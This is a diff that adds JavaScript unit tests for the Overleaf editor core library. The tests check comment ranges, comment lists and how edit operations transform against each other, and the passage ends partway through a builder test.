-0,0 +1,62 @@ +'use strict' + +const { expect } = require('chai') +const core = require('..') +const Change = core.Change +const File = core.File +const Operation = core.Operation + +describe('Change', function () { + describe('findBlobHashes', function () { + it('finds blob hashes from operations', function () { + const blobHashes = new Set() + + const change = Change.fromRaw({ + operations: [], + timestamp: '2015-03-05T12:03:53.035Z', + authors: [null], + }) + + change.findBlobHashes(blobHashes) + expect(blobHashes.size).to.equal(0) + + // AddFile with content doesn't have a hash. + change.pushOperation(Operation.addFile('a.txt', File.fromString('a'))) + change.findBlobHashes(blobHashes) + expect(blobHashes.size).to.equal(0) + + // AddFile with hash should give us a hash. + change.pushOperation( + Operation.addFile('b.txt', File.fromHash(File.EMPTY_FILE_HASH)) + ) + change.findBlobHashes(blobHashes) + expect(blobHashes.size).to.equal(1) + expect(blobHashes.has(File.EMPTY_FILE_HASH)).to.be.true + }) + }) + + describe('RestoreFileOrigin', function () { + it('should convert to and from raw', function () { + const origin = new core.RestoreFileOrigin(1, 'path', new Date()) + const raw = origin.toRaw() + const newOrigin = core.Origin.fromRaw(raw) + expect(newOrigin).to.eql(origin) + }) + + it('change should have a correct origin class', function () { + const change = Change.fromRaw({ + operations: [], + timestamp: '2015-03-05T12:03:53.035Z', + authors: [null], + origin: { + kind: 'file-restore', + version: 1, + path: 'path', + timestamp: '2015-03-05T12:03:53.035Z', + }, + }) + + expect(change.getOrigin()).to.be.an.instanceof(core.RestoreFileOrigin) + }) + }) +}) diff --git a/libraries/overleaf-editor-core/test/comment.test.js b/libraries/overleaf-editor-core/test/comment.test.js new file mode 100644 index 0000000..f235c9e --- /dev/null +++ b/libraries/overleaf-editor-core/test/comment.test.js @@ -0,0 +1,116 @@ +// @ts-check +'use strict' + +const { expect } = require('chai') +const Comment = require('../lib/comment') +const Range = require('../lib/range') + +describe('Comment', function () { + it('should move ranges to the right of insert', function () { + const comment = new Comment('c1', [new Range(5, 10)]) + const resComment = comment.applyInsert(3, 5, false) + expect(resComment.ranges).to.eql([new Range(10, 10)]) + }) + + describe('applyInsert', function () { + it('should insert 1 char before the range', function () { + const comment = new Comment('c1', [new Range(5, 10)]) + expect(comment.applyInsert(4, 1).ranges).to.eql([new Range(6, 10)]) + }) + + it('should insert 1 char at the edge, without expandCommand', function () { + const comment = new Comment('c1', [new Range(5, 10)]) + expect(comment.applyInsert(5, 1).ranges).to.eql([new Range(6, 10)]) + }) + + it('should insert 1 char at the edge, with expandCommand', function () { + const comment = new Comment('c1', [new Range(5, 10)]) + expect(comment.applyInsert(5, 1, true).ranges).to.eql([new Range(5, 11)]) + }) + + it('should expand the range after insert inside it', function () { + const comment = new Comment('c1', [new Range(5, 10)]) + expect(comment.applyInsert(6, 1, true).ranges).to.eql([new Range(5, 11)]) + }) + }) + + it('should split the range if inside another and expandComment is false', function () { + const comment = new Comment('c1', [new Range(5, 10)]) + const commentRes = comment.applyInsert(6, 10, false) + expect(commentRes.ranges).to.eql([new Range(5, 1), new Range(16, 9)]) + }) + + it('should insert the range if expandComment is false', function () { + const comment = new Comment('c1', [new Range(5, 10)]) + const commentRes = comment.applyInsert(14, 10, false) + expect(commentRes.ranges).to.eql([new Range(5, 9), new Range(24, 1)]) + }) + + it('should move the range if insert is at range start and expandComment is false', function () { + const comment = new Comment('c1', [new Range(5, 10)]) + const commentRes = comment.applyInsert(5, 10, false) + expect(commentRes.ranges).to.eql([new Range(15, 10)]) + }) + + it('should ignore the range if insert is at range end and expandComment is false', function () { + const comment = new Comment('c1', [new Range(5, 10)]) + const commentRes = comment.applyInsert(15, 10, false) + expect(commentRes.ranges).to.eql([new Range(5, 10)]) + }) + + it('should expand the range after inserting on the edge of it if expandComment is true', function () { + const comment = new Comment('c1', [new Range(5, 10)]) + const commentRes = comment.applyInsert(15, 10, true) + expect(commentRes.ranges).to.eql([new Range(5, 20)]) + }) + + it('should move comment ranges if delete is before it', function () { + const comment = new Comment('c1', [new Range(5, 10)]) + const commentRes = comment.applyDelete(new Range(3, 5)) + expect(commentRes.ranges).to.eql([new Range(3, 7)]) + }) + + it('should merge ranges after delete', function () { + const comment = new Comment('c1', [new Range(5, 10), new Range(20, 10)]) + const commentRes = comment.applyDelete(new Range(7, 18)) + expect(commentRes.ranges).to.eql([new Range(5, 7)]) + }) + + it('should merge overlapping ranges', function () { + const comment = new Comment('c1', [ + new Range(5, 10), + new Range(15, 20), + new Range(50, 10), + ]) + expect(comment.ranges).to.eql([new Range(5, 30), new Range(50, 10)]) + }) + + it('should merge unsorted ranges', function () { + const comment = new Comment('c1', [ + new Range(15, 20), + new Range(50, 10), + new Range(5, 10), + ]) + expect(comment.ranges).to.eql([new Range(5, 30), new Range(50, 10)]) + }) + + it('should throw error when ranges overlap', function () { + expect( + () => + new Comment('c1', [ + new Range(5, 10), + new Range(10, 5), + new Range(50, 10), + ]) + ).to.throw() + }) + + it('should join touching ranges', function () { + const comment = new Comment('c1', [ + new Range(5, 10), + new Range(15, 5), + new Range(50, 10), + ]) + expect(comment.ranges).to.eql([new Range(5, 15), new Range(50, 10)]) + }) +}) diff --git a/libraries/overleaf-editor-core/test/comments_list.test.js b/libraries/overleaf-editor-core/test/comments_list.test.js new file mode 100644 index 0000000..d687863 --- /dev/null +++ b/libraries/overleaf-editor-core/test/comments_list.test.js @@ -0,0 +1,430 @@ +// @ts-check +'use strict' + +const { expect } = require('chai') +const CommentList = require('../lib/file_data/comment_list') +const Comment = require('../lib/comment') +const Range = require('../lib/range') + +describe('commentList', function () { + it('checks if toRaw() returns a correct comment list', function () { + const commentList = new CommentList([ + new Comment('comm1', [new Range(5, 10)]), + new Comment('comm2', [new Range(20, 5)]), + new Comment('comm3', [new Range(30, 15)]), + ]) + + expect(commentList.toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 5, length: 10 }] }, + { id: 'comm2', ranges: [{ pos: 20, length: 5 }] }, + { + id: 'comm3', + ranges: [{ pos: 30, length: 15 }], + }, + ]) + }) + + it('should get a comment by id', function () { + const commentList = new CommentList([ + new Comment('comm1', [new Range(5, 10)]), + new Comment('comm3', [new Range(30, 15)]), + new Comment('comm2', [new Range(20, 5)]), + ]) + + const comment = commentList.getComment('comm2') + expect(comment?.toRaw()).to.eql({ + id: 'comm2', + ranges: [ + { + pos: 20, + length: 5, + }, + ], + }) + }) + + it('should add new comment to the list', function () { + const commentList = new CommentList([ + new Comment('comm1', [new Range(5, 10)]), + new Comment('comm2', [new Range(20, 5)]), + new Comment('comm3', [new Range(30, 15)]), + ]) + + commentList.add(new Comment('comm4', [new Range(40, 10)])) + expect(commentList.toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 5, length: 10 }] }, + { id: 'comm2', ranges: [{ pos: 20, length: 5 }] }, + { + id: 'comm3', + ranges: [{ pos: 30, length: 15 }], + }, + { + id: 'comm4', + ranges: [{ pos: 40, length: 10 }], + }, + ]) + }) + + it('should overwrite existing comment if new one is added', function () { + const commentList = new CommentList([ + new Comment('comm1', [new Range(5, 10)], false), + new Comment('comm2', [new Range(20, 5)], true), + new Comment('comm3', [new Range(30, 15)]), + ]) + + commentList.add(new Comment('comm1', [new Range(5, 10)], true)) + commentList.add(new Comment('comm2', [new Range(40, 10)], true)) + + expect(commentList.toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 5, length: 10 }], resolved: true }, + { + id: 'comm2', + ranges: [{ pos: 40, length: 10 }], + resolved: true, + }, + { + id: 'comm3', + ranges: [{ pos: 30, length: 15 }], + }, + ]) + }) + + it('should delete a comment from the list', function () { + const commentList = new CommentList([ + new Comment('comm1', [new Range(5, 10)]), + new Comment('comm2', [new Range(20, 5)]), + new Comment('comm3', [new Range(30, 15)]), + ]) + + commentList.delete('comm3') + expect(commentList.toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 5, length: 10 }] }, + { id: 'comm2', ranges: [{ pos: 20, length: 5 }] }, + ]) + }) + + it('should not throw an error if comment id does not exist', function () { + const commentList = new CommentList([ + new Comment('comm1', [new Range(5, 10)]), + new Comment('comm2', [new Range(20, 5)]), + new Comment('comm3', [new Range(30, 15)]), + ]) + + commentList.delete('comm5') + + expect(commentList.toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 5, length: 10 }] }, + { id: 'comm2', ranges: [{ pos: 20, length: 5 }] }, + { + id: 'comm3', + ranges: [{ pos: 30, length: 15 }], + }, + ]) + }) + + it('should be iterable', function () { + const comment = new Comment('comm1', [new Range(5, 10)]) + const commentList = new CommentList([comment]) + expect(Array.from(commentList)).to.deep.equal([comment]) + }) + + describe('inserting a comment between ranges', function () { + it('should expand comment on the left', function () { + const commentList = CommentList.fromRaw([ + { + id: 'comm1', + ranges: [{ pos: 5, length: 10 }], + }, + { + id: 'comm2', + ranges: [{ pos: 15, length: 10 }], + }, + ]) + + commentList.applyInsert(new Range(15, 5), { commentIds: ['comm1'] }) + expect(commentList.toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 5, length: 15 }] }, + { id: 'comm2', ranges: [{ pos: 20, length: 10 }] }, + ]) + }) + + it('should expand comment on the right', function () { + const commentList = CommentList.fromRaw([ + { + id: 'comm1', + ranges: [{ pos: 5, length: 10 }], + }, + { + id: 'comm2', + ranges: [{ pos: 15, length: 10 }], + }, + ]) + + commentList.applyInsert(new Range(15, 5), { commentIds: ['comm2'] }) + expect(commentList.toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 5, length: 10 }] }, + { id: 'comm2', ranges: [{ pos: 15, length: 15 }] }, + ]) + }) + }) + + it('should delete a text overlapping two comments', function () { + const commentList = CommentList.fromRaw([ + { + id: 'comm1', + ranges: [{ pos: 5, length: 10 }], // 5-14 + }, + { + id: 'comm2', + ranges: [{ pos: 15, length: 10 }], // 15-24 + }, + ]) + + commentList.applyDelete(new Range(10, 10)) // 10-19 + expect(commentList.toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 5, length: 5 }] }, + { id: 'comm2', ranges: [{ pos: 10, length: 5 }] }, + ]) + }) + + describe('move ranges after insert/delete operations', function () { + it('expands comments inside inserted text', function () { + const commentList = CommentList.fromRaw([ + { + id: 'comm1', + ranges: [{ pos: 5, length: 10 }], + }, + { + id: 'comm2', + ranges: [{ pos: 20, length: 5 }], + }, + { + id: 'comm3', + ranges: [{ pos: 30, length: 15 }], + }, + ]) + + commentList.applyInsert(new Range(7, 5), { commentIds: ['comm1'] }) + expect(commentList.toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 5, length: 15 }] }, + { id: 'comm2', ranges: [{ pos: 25, length: 5 }] }, + { id: 'comm3', ranges: [{ pos: 35, length: 15 }] }, + ]) + }) + + it('should insert an overlapping comment without overlapped comment id', function () { + const commentList = CommentList.fromRaw([ + { + id: 'comm1', + ranges: [{ pos: 5, length: 10 }], + }, + { + id: 'comm2', + ranges: [{ pos: 20, length: 5 }], + }, + { + id: 'comm3', + ranges: [{ pos: 30, length: 15 }], + }, + ]) + + commentList.applyInsert(new Range(7, 5), { commentIds: ['comm2'] }) + expect(commentList.toRaw()).to.eql([ + { + id: 'comm1', + ranges: [ + { pos: 5, length: 2 }, + { pos: 12, length: 8 }, + ], + }, + { + id: 'comm2', + ranges: [ + { pos: 7, length: 5 }, + { pos: 25, length: 5 }, + ], + }, + { id: 'comm3', ranges: [{ pos: 35, length: 15 }] }, + ]) + }) + + it('should insert an overlapping comment with overlapped comment id', function () { + const commentList = CommentList.fromRaw([ + { + id: 'comm1', + ranges: [{ pos: 5, length: 15 }], + }, + { + id: 'comm2', + ranges: [{ pos: 20, length: 5 }], + }, + { + id: 'comm3', + ranges: [{ pos: 30, length: 15 }], + }, + ]) + + commentList.applyInsert(new Range(7, 5), { + commentIds: ['comm1', 'comm2'], + }) + expect(commentList.toRaw()).to.eql([ + { + id: 'comm1', + ranges: [{ pos: 5, length: 20 }], + }, + { + id: 'comm2', + ranges: [ + { pos: 7, length: 5 }, + { pos: 25, length: 5 }, + ], + }, + { id: 'comm3', ranges: [{ pos: 35, length: 15 }] }, + ]) + }) + + it('moves comments after inserted text', function () { + const commentList = CommentList.fromRaw([ + { + id: 'comm1', + ranges: [{ pos: 5, length: 10 }], + }, + { + id: 'comm2', + ranges: [{ pos: 20, length: 5 }], + }, + { + id: 'comm3', + ranges: [{ pos: 30, length: 15 }], + }, + ]) + + commentList.applyInsert(new Range(16, 5)) + expect(commentList.toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 5, length: 10 }] }, + { id: 'comm2', ranges: [{ pos: 25, length: 5 }] }, + { id: 'comm3', ranges: [{ pos: 35, length: 15 }] }, + ]) + }) + + it('does not affect comments outside of inserted text', function () { + const commentList = CommentList.fromRaw([ + { + id: 'comm1', + ranges: [{ pos: 5, length: 10 }], + }, + { + id: 'comm2', + ranges: [{ pos: 20, length: 5 }], + }, + { + id: 'comm3', + ranges: [{ pos: 30, length: 15 }], + }, + ]) + + commentList.applyInsert(new Range(50, 5)) + expect(commentList.toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 5, length: 10 }] }, + { id: 'comm2', ranges: [{ pos: 20, length: 5 }] }, + { id: 'comm3', ranges: [{ pos: 30, length: 15 }] }, + ]) + }) + + it('should move comments if delete happened before it', function () { + const commentList = CommentList.fromRaw([ + { + id: 'comm1', + ranges: [{ pos: 5, length: 10 }], + }, + { + id: 'comm2', + ranges: [{ pos: 20, length: 5 }], + }, + { + id: 'comm3', + ranges: [{ pos: 30, length: 15 }], + }, + ]) + + commentList.applyDelete(new Range(0, 4)) + expect(commentList.toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 1, length: 10 }] }, + { id: 'comm2', ranges: [{ pos: 16, length: 5 }] }, + { id: 'comm3', ranges: [{ pos: 26, length: 15 }] }, + ]) + }) + + describe('should remove part of a comment on delete overlapping', function () { + it('should delete intersection from the left', function () { + const commentList = CommentList.fromRaw([ + { + id: 'comm1', + ranges: [{ pos: 5, length: 10 }], + }, + ]) + + commentList.applyDelete(new Range(0, 6)) + expect(commentList.toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 0, length: 9 }] }, + ]) + }) + + it('should delete intersection from the right', function () { + const commentList = CommentList.fromRaw([ + { + id: 'comm1', + ranges: [{ pos: 5, length: 10 }], + }, + ]) + commentList.applyDelete(new Range(7, 10)) + expect(commentList.toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 5, length: 2 }] }, + ]) + }) + + it('should delete intersection in the middle', function () { + const commentList = CommentList.fromRaw([ + { + id: 'comm1', + ranges: [{ pos: 5, length: 10 }], + }, + ]) + commentList.applyDelete(new Range(6, 2)) + expect(commentList.toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 5, length: 8 }] }, + ]) + }) + }) + + it('should leave comment without ranges', function () { + const commentList = CommentList.fromRaw([ + { + id: 'comm1', + ranges: [{ pos: 5, length: 10 }], + }, + { + id: 'comm2', + ranges: [{ pos: 20, length: 5 }], + }, + { + id: 'comm3', + ranges: [{ pos: 30, length: 15 }], + }, + ]) + + commentList.applyDelete(new Range(19, 10)) + expect(commentList.toRaw()).to.eql([ + { + id: 'comm1', + ranges: [{ pos: 5, length: 10 }], + }, + { id: 'comm2', ranges: [] }, + { + id: 'comm3', + ranges: [{ pos: 20, length: 15 }], + }, + ]) + }) + }) +}) diff --git a/libraries/overleaf-editor-core/test/delete_comment_operation.test.js b/libraries/overleaf-editor-core/test/delete_comment_operation.test.js new file mode 100644 index 0000000..c6d2260 --- /dev/null +++ b/libraries/overleaf-editor-core/test/delete_comment_operation.test.js @@ -0,0 +1,46 @@ +// @ts-check +const { expect } = require('chai') +const { AddCommentOperation, DeleteCommentOperation } = require('..') +const Comment = require('../lib/comment') +const StringFileData = require('../lib/file_data/string_file_data') +const Range = require('../lib/range') + +describe('DeleteCommentOperation', function () { + it('constructs an DeleteCommentOperation fromJSON', function () { + const op = DeleteCommentOperation.fromJSON({ + deleteComment: '123', + }) + expect(op).to.be.instanceOf(DeleteCommentOperation) + }) + + it('should convert to JSON', function () { + const op = new DeleteCommentOperation('123') + expect(op.toJSON()).to.eql({ + deleteComment: '123', + }) + }) + + it('should apply operation', function () { + const fileData = new StringFileData('abc') + const op = new DeleteCommentOperation('123') + fileData.comments.add(new Comment('123', [new Range(0, 1)])) + op.apply(fileData) + expect(fileData.getComments().toRaw()).to.eql([]) + }) + + it('should invert operation', function () { + const fileData = new StringFileData('abc') + const op = new DeleteCommentOperation('123') + fileData.comments.add(new Comment('123', [new Range(0, 1)])) + const invertedOp = /** @type {AddCommentOperation} */ (op.invert(fileData)) + expect(invertedOp).to.be.instanceOf(AddCommentOperation) + expect(invertedOp.commentId).to.equal('123') + expect(invertedOp.ranges).to.eql([new Range(0, 1)]) + }) + + it('should not throw if comment not found', function () { + const fileData = new StringFileData('abc') + const op = new DeleteCommentOperation('123') + expect(() => op.invert(fileData)).to.not.throw() + }) +}) diff --git a/libraries/overleaf-editor-core/test/edit_file_operation.test.js b/libraries/overleaf-editor-core/test/edit_file_operation.test.js new file mode 100644 index 0000000..c51e380 --- /dev/null +++ b/libraries/overleaf-editor-core/test/edit_file_operation.test.js @@ -0,0 +1,81 @@ +// @ts-check +'use strict' + +const { expect } = require('chai') + +const ot = require('..') +const EditOperationBuilder = require('../lib/operation/edit_operation_builder') +const File = ot.File +const Operation = ot.Operation + +describe('EditFileOperation', function () { + function edit(pathname, textOperationJsonObject) { + return Operation.editFile( + pathname, + EditOperationBuilder.fromJSON({ textOperation: textOperationJsonObject }) + ) + } + + describe('canBeComposedWith', function () { + it('on the same file', function () { + const editFileOperation1 = edit('foo.tex', ['x']) + const editFileOperation2 = edit('foo.tex', [1, 'y']) + expect(editFileOperation1.canBeComposedWith(editFileOperation2)).to.be + .true + }) + + it('on different files', function () { + const editFileOperation1 = edit('foo.tex', ['x']) + const editFileOperation2 = edit('bar.tex', ['y']) + expect(editFileOperation1.canBeComposedWith(editFileOperation2)).to.be + .false + }) + + it('with a different type of opperation', function () { + const editFileOperation1 = edit('foo.tex', ['x']) + const editFileOperation2 = Operation.addFile( + 'bar.tex', + File.fromString('') + ) + expect(editFileOperation1.canBeComposedWith(editFileOperation2)).to.be + .false + }) + + it('with incompatible lengths', function () { + const editFileOperation1 = edit('foo.tex', ['x']) + const editFileOperation2 = edit('foo.tex', [2, 'y']) + expect(editFileOperation1.canBeComposedWith(editFileOperation2)).to.be + .false + }) + }) + + describe('canBeComposedWithForUndo', function () { + it('can', function () { + const editFileOperation1 = edit('foo.tex', ['x']) + const editFileOperation2 = edit('foo.tex', [1, 'y']) + expect(editFileOperation1.canBeComposedWithForUndo(editFileOperation2)).to + .be.true + }) + + it('cannot', function () { + const editFileOperation1 = edit('foo.tex', ['x']) + const editFileOperation2 = edit('foo.tex', ['y', 1, 'z']) + expect(editFileOperation1.canBeComposedWithForUndo(editFileOperation2)).to + .be.false + }) + }) + + describe('compose', function () { + it('composes text operations', function () { + const editFileOperation1 = edit('foo.tex', ['x']) + const editFileOperation2 = edit('foo.tex', [1, 'y']) + const composedFileOperation = + editFileOperation1.compose(editFileOperation2) + const expectedComposedFileOperation = edit('foo.tex', ['xy']) + expect(composedFileOperation).to.deep.equal(expectedComposedFileOperation) + + // check that the original operation wasn't modified + expect(editFileOperation1).to.deep.equal(edit('foo.tex', ['x'])) + }) + }) +}) diff --git a/libraries/overleaf-editor-core/test/edit_operation.test.js b/libraries/overleaf-editor-core/test/edit_operation.test.js new file mode 100644 index 0000000..56570f0 --- /dev/null +++ b/libraries/overleaf-editor-core/test/edit_operation.test.js @@ -0,0 +1,315 @@ +const { expect } = require('chai') +const EditOperationBuilder = require('../lib/operation/edit_operation_builder') +const TextOperation = require('../lib/operation/text_operation') +const EditOperationTransformer = require('../lib/operation/edit_operation_transformer') +const EditOperation = require('../lib/operation/edit_operation') +const randomTextOperation = require('./support/random_text_operation') +const random = require('./support/random') +const AddCommentOperation = require('../lib/operation/add_comment_operation') +const DeleteCommentOperation = require('../lib/operation/delete_comment_operation') +const SetCommentStateOperation = require('../lib/operation/set_comment_state_operation') +const Range = require('../lib/range') +const EditNoOperation = require('../lib/operation/edit_no_operation') + +describe('EditOperation', function () { + it('Cannot be instantiated', function () { + expect(() => new EditOperation()).to.throw( + 'Cannot instantiate abstract class' + ) + }) +}) + +describe('EditOperationTransformer', function () { + it('Transforms two TextOperations', function () { + const a = new TextOperation().insert('foo') + const b = new TextOperation().insert('bar') + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(TextOperation) + expect(bPrime).to.be.an.instanceof(TextOperation) + }) + + it('Transforms TextOperation and EditNoOperation', function () { + const a = new TextOperation().insert('foo') + const b = new EditNoOperation() + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(TextOperation) + expect(bPrime).to.be.an.instanceof(EditNoOperation) + }) + + it('Transforms two AddCommentOperations with same commentId', function () { + const a = new AddCommentOperation('comm1', [new Range(0, 1)]) + const b = new AddCommentOperation('comm1', [new Range(2, 3)]) + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(EditNoOperation) + expect(bPrime).to.be.an.instanceof(AddCommentOperation) + }) + + it('Transforms two AddCommentOperations with different commentId', function () { + const a = new AddCommentOperation('comm1', [new Range(0, 1)]) + const b = new AddCommentOperation('comm2', [new Range(2, 3)]) + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(AddCommentOperation) + expect(aPrime.toJSON()).to.eql(a.toJSON()) + expect(bPrime).to.be.an.instanceof(AddCommentOperation) + expect(bPrime.toJSON()).to.eql(b.toJSON()) + }) + + it('Transforms two DeleteCommentOperations with same commentId', function () { + const a = new DeleteCommentOperation('comm1') + const b = new DeleteCommentOperation('comm1') + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(EditNoOperation) + expect(bPrime).to.be.an.instanceof(EditNoOperation) + }) + + it('Transforms two DeleteCommentOperations with different commentId', function () { + const a = new DeleteCommentOperation('comm1') + const b = new DeleteCommentOperation('comm2') + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(DeleteCommentOperation) + expect(aPrime.toJSON()).to.eql(a.toJSON()) + expect(bPrime).to.be.an.instanceof(DeleteCommentOperation) + expect(bPrime.toJSON()).to.eql(b.toJSON()) + }) + + it('Transforms AddCommentOperation and DeleteCommentOperation with same commentId', function () { + const a = new AddCommentOperation('comm1', [new Range(0, 1)]) + const b = new DeleteCommentOperation('comm1') + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(EditNoOperation) + expect(bPrime).to.be.an.instanceof(DeleteCommentOperation) + expect(bPrime.toJSON()).to.eql(b.toJSON()) + }) + + it('Transforms DeleteCommentOperation and AddCommentOperation with same commentId', function () { + const a = new DeleteCommentOperation('comm1') + const b = new AddCommentOperation('comm1', [new Range(0, 1)]) + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(DeleteCommentOperation) + expect(aPrime.toJSON()).to.eql(a.toJSON()) + expect(bPrime).to.be.an.instanceof(EditNoOperation) + }) + + it('Transforms AddCommentOperation and TextOperation', function () { + // abc hello[ world] xyz - insert(9, " world") + // abc hello |xyz| - addComment(10, 3, "comment_id") + + const a = new TextOperation().retain(9).insert(' world') + const b = new AddCommentOperation('comm1', [new Range(10, 3)]) + + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(TextOperation) + expect(aPrime.toJSON()).to.eql(a.toJSON()) + expect(bPrime).to.be.an.instanceof(AddCommentOperation) + expect(bPrime.toJSON()).to.eql({ + commentId: 'comm1', + ranges: [{ pos: 16, length: 3 }], + }) + }) + + it('Transforms TextOperation and AddCommentOperation', function () { + // abc hello |xyz| - addComment(10, 3, "comment_id") + // abc hello[ world] xyz - insert(9, " world") + + const a = new AddCommentOperation('comm1', [new Range(10, 3)]) + const b = new TextOperation().retain(9).insert(' world') + + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(bPrime).to.be.an.instanceof(TextOperation) + expect(bPrime.toJSON()).to.eql(b.toJSON()) + expect(aPrime).to.be.an.instanceof(AddCommentOperation) + expect(aPrime.toJSON()).to.eql({ + commentId: 'comm1', + ranges: [{ pos: 16, length: 3 }], + }) + }) + + it('Transforms AddCommentOperation and TextOperation that makes a detached comment', function () { + // [abc hello xyz] - delete(0, 13) + // abc |hello| xyz - addComment(5, 5, "comment_id") + + const a = new TextOperation().remove(13) + const b = new AddCommentOperation('comm1', [new Range(5, 5)]) + + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(TextOperation) + expect(aPrime.toJSON()).to.eql(a.toJSON()) + expect(bPrime).to.be.an.instanceof(AddCommentOperation) + expect(bPrime.toJSON()).to.eql({ + commentId: 'comm1', + ranges: [], + }) + }) + + it('Transforms AddCommentOperation and deletion TextOperation', function () { + // abc hell{o xy}z - retain(8).delete(4) + // abc hello |xyz| - addComment(10, 3, "comment_id") + // abc hell|z| + + const a = new TextOperation().retain(8).remove(4) + const b = new AddCommentOperation('comm1', [new Range(10, 3)]) + + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(TextOperation) + expect(aPrime.toJSON()).to.eql(a.toJSON()) + expect(bPrime).to.be.an.instanceof(AddCommentOperation) + expect(bPrime.toJSON()).to.eql({ + commentId: 'comm1', + ranges: [{ pos: 8, length: 1 }], + }) + }) + + it('Transforms AddCommentOperation and complex TextOperation', function () { + // [foo ]abc hell{o xy}z - insert(0, "foo ").retain(8).delete(4) + // abc hello |xyz| - addComment(10, 3, "comment_id") + // foo abc hell|z| + + const a = new TextOperation().insert('foo ').retain(8).remove(4) + const b = new AddCommentOperation('comm1', [new Range(10, 3)]) + + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(TextOperation) + expect(aPrime.toJSON()).to.eql(a.toJSON()) + expect(bPrime).to.be.an.instanceof(AddCommentOperation) + expect(bPrime.toJSON()).to.eql({ + commentId: 'comm1', + ranges: [{ pos: 12, length: 1 }], + }) + }) + + it('Transforms DeleteCommentOperation and TextOperation', function () { + const a = new TextOperation().retain(9).insert(' world') + const b = new DeleteCommentOperation('comm1') + + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(TextOperation) + expect(aPrime.toJSON()).to.eql(a.toJSON()) + expect(bPrime).to.be.an.instanceof(DeleteCommentOperation) + expect(bPrime.toJSON()).to.eql(b.toJSON()) + }) + + it('Transforms SetCommentStateOperation and TextOperation', function () { + const a = new TextOperation().retain(9).insert(' world') + const b = new SetCommentStateOperation('comm1', true) + + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(TextOperation) + expect(aPrime.toJSON()).to.eql(a.toJSON()) + expect(bPrime).to.be.an.instanceof(SetCommentStateOperation) + expect(bPrime.toJSON()).to.eql(b.toJSON()) + }) + + it('Transforms SetCommentStateOperation and AddCommentOperation', function () { + const a = new AddCommentOperation('comm1', [new Range(0, 1)]) + const b = new SetCommentStateOperation('comm1', true) + + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(AddCommentOperation) + expect(aPrime.toJSON()).to.deep.eql({ + commentId: 'comm1', + ranges: [{ pos: 0, length: 1 }], + resolved: true, + }) + expect(bPrime).to.be.an.instanceof(SetCommentStateOperation) + expect(bPrime.toJSON()).to.deep.eql(b.toJSON()) + }) + + it('Transforms SetCommentStateOperation and DeleteCommentOperation', function () { + const a = new DeleteCommentOperation('comm1') + const b = new SetCommentStateOperation('comm1', true) + + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(DeleteCommentOperation) + expect(aPrime.toJSON()).to.deep.eql(a.toJSON()) + expect(bPrime).to.be.an.instanceof(EditNoOperation) + }) + + it('Transforms SetCommentStateOperation and SetCommentStateOperation', function () { + const a = new SetCommentStateOperation('comm1', false) + const b = new SetCommentStateOperation('comm1', true) + + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime.toJSON()).to.deep.eql({ + commentId: 'comm1', + resolved: false, + }) + expect(bPrime).to.be.an.instanceof(EditNoOperation) + }) + + it('Transforms two SetCommentStateOperation with different commentId', function () { + const a = new SetCommentStateOperation('comm1', false) + const b = new SetCommentStateOperation('comm2', true) + + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(SetCommentStateOperation) + expect(aPrime.toJSON()).to.deep.eql(a.toJSON()) + expect(bPrime).to.be.an.instanceof(SetCommentStateOperation) + expect(bPrime.toJSON()).to.deep.eql(b.toJSON()) + }) +}) + +describe('EditOperationBuilder', function () { + it('Constructs TextOperation from JSON', function () { + const raw = { + textOperation: [1, 'foo', 3], + } + const op = EditOperationBuilder.fromJSON(raw) + expect(op).to.be.an.instanceof(TextOperation) + expect(op.toJSON()).to.deep.equal(raw) + }) + + it('Constructs AddCommentOperation from JSON', function () { + const raw = { + commentId: 'comm1', + ranges: [{ pos: 0, length: 1 }], + } + const op = EditOperationBuilder.fromJSON(raw) + expect(op).to.be.an.instanceof(AddCommentOperation) + expect(op.toJSON()).to.deep.equal(raw) + }) + + it('Constructs DeleteCommentOperation from JSON', function () { + const raw = { + deleteComment: 'comm1', + } + const op = EditOperationBuilder.fromJSON(raw) + expect(op).to.be.an.instanceof(DeleteCommentOperation) + 